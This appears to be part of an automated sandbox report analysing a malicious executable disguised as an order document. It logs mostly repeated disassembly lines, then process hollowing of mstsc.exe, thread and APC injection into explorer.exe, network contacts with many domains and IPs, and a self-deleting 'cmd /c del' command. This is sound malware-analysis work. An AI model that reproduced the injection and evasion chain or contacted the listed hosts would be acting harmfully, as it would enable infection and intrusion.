          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B57016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B57016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B57016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04BA4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04BA4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04BA740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04BA740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04BA740D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B91C06 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B56C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B56C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B56C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B56C0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AF746D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B92073 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04BA1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B6C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B6C450 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B0A44B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AF0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AF0050 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B01DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B01DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B01DB5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B551BE mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B061A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B061A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B035A1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B569A6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04BA05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04BA05AC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B02990 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AD2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AD2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AD2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AD2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AD2D8A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B0FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B0FD9B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AFC182 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B02581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B02581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B02581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B02581 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B0A185 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B88DF1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04ADB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04ADB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04ADB1E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AED5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AED5E0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B9FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B9FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B9FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B9FDE2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B641E8 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B56DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B56DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B56DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B56DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B56DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B56DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B9E539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B5A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B0513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B0513A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B04D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B04D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B04D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04BA8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AF4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AF4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AF4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AF4120 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AF4120 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AE3D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04ADAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AD9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AD9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AD9100 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04ADC962 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AFC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AFC577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04ADB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04ADB171 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AFB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AFB944 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B13D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B53540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AF7D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B0FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AD52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AD52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AD52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AD52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AD52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B546A7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AEAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AEAAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04BA0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04BA0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04BA0EA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B0D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B0D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B6FE87 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AE76E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B016E0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B02AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04BA8ED6 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B18EC7 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B8FEC0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B02ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B036CC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B8FE3F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04ADE620 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B14A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B14A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AE8A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B0A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B0A61C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04ADC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04ADC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04ADC600 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B08E00 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B91608 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AF3A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04ADAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04ADAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AD5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AD5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AD5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AD5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AE766D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B1927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B8B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B8B260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04BA8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AFAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AFAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AFAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AFAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AFAE73 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B64257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B9EA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AD9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AD9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AD9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AD9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AE7E41 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B9AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B9AE44 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B04BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B04BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B04BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04BA5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B0B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AE1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AE1B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B57794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B57794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B57794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B02397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B9138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B8D380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AE8794 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04B137F5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\SysWOW64\mstsc.exeCode function: 3_2_04AFDBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeProcess token adjusted: Debug
          Source: C:\Windows\SysWOW64\mstsc.exeProcess token adjusted: Debug
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeMemory allocated: page read and write | page guard

          HIPS / PFW / Operating System Protection Evasion:

          barindex
          System process connects to network (likely due to code injection or exploit)Show sources
          Source: C:\Windows\explorer.exeDomain query: www.shadyshainarae.com
          Source: C:\Windows\explorer.exeDomain query: www.xn--80aasvjfhla.xn--p1acf
          Source: C:\Windows\explorer.exeNetwork Connect: 107.164.93.172 80
          Source: C:\Windows\explorer.exeDomain query: www.tjanyancha.com
          Source: C:\Windows\explorer.exeNetwork Connect: 162.241.62.63 80
          Source: C:\Windows\explorer.exeDomain query: www.pocopage.com
          Source: C:\Windows\explorer.exeNetwork Connect: 66.96.162.130 80
          Source: C:\Windows\explorer.exeDomain query: www.goodcreditcardshome.info
          Source: C:\Windows\explorer.exeDomain query: www.paperplaneexplorer.com
          Source: C:\Windows\explorer.exeDomain query: www.usapersonalshopper.com
          Source: C:\Windows\explorer.exeNetwork Connect: 104.164.26.246 80
          Source: C:\Windows\explorer.exeDomain query: www.dmowang.com
          Source: C:\Windows\explorer.exeDomain query: www.comicstattoosnguns.com
          Source: C:\Windows\explorer.exeNetwork Connect: 34.102.136.180 80
          Source: C:\Windows\explorer.exeNetwork Connect: 18.219.49.238 80
          Source: C:\Windows\explorer.exeDomain query: www.thefrankversion.com
          Source: C:\Windows\explorer.exeDomain query: www.pasteleriaruth.com
          Source: C:\Windows\explorer.exeDomain query: www.goeseo.com
          Source: C:\Windows\explorer.exeNetwork Connect: 198.54.117.216 80
          Injects a PE file into a foreign processesShow sources
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeMemory written: C:\Users\user\Desktop\Order 122001-220 guanzo.exe base: 400000 value starts with: 4D5A
          Maps a DLL or memory area into another processShow sources
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeSection loaded: unknown target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and write
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeSection loaded: unknown target: C:\Windows\SysWOW64\mstsc.exe protection: execute and read and write
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: read write
          Source: C:\Windows\SysWOW64\mstsc.exeSection loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
          Modifies the context of a thread in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeThread register set: target process: 3424
          Source: C:\Windows\SysWOW64\mstsc.exeThread register set: target process: 3424
          Queues an APC in another process (thread injection)Show sources
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeThread APC queued: target process: C:\Windows\explorer.exe
          Sample uses process hollowing techniqueShow sources
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeSection unmapped: C:\Windows\SysWOW64\mstsc.exe base address: 9D0000
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeProcess created: C:\Users\user\Desktop\Order 122001-220 guanzo.exe C:\Users\user\Desktop\Order 122001-220 guanzo.exe
          Source: C:\Windows\SysWOW64\mstsc.exeProcess created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\user\Desktop\Order 122001-220 guanzo.exe'
          Source: explorer.exe, 00000002.00000002.931217061.0000000000AD8000.00000004.00000020.sdmpBinary or memory string: ProgmanMD6
          Source: explorer.exe, 00000002.00000002.931555080.0000000001080000.00000002.00000001.sdmp, mstsc.exe, 00000003.00000002.932307021.0000000003360000.00000002.00000001.sdmpBinary or memory string: Program Manager
          Source: explorer.exe, 00000002.00000002.931555080.0000000001080000.00000002.00000001.sdmp, mstsc.exe, 00000003.00000002.932307021.0000000003360000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
          Source: explorer.exe, 00000002.00000002.931555080.0000000001080000.00000002.00000001.sdmp, mstsc.exe, 00000003.00000002.932307021.0000000003360000.00000002.00000001.sdmpBinary or memory string: Progman
          Source: explorer.exe, 00000002.00000002.931555080.0000000001080000.00000002.00000001.sdmp, mstsc.exe, 00000003.00000002.932307021.0000000003360000.00000002.00000001.sdmpBinary or memory string: Progmanlock
          Source: explorer.exe, 00000002.00000000.693486523.000000000A716000.00000004.00000001.sdmpBinary or memory string: Shell_TrayWnd5D
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeQueries volume information: C:\Users\user\Desktop\Order 122001-220 guanzo.exe VolumeInformation
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
          Source: C:\Users\user\Desktop\Order 122001-220 guanzo.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
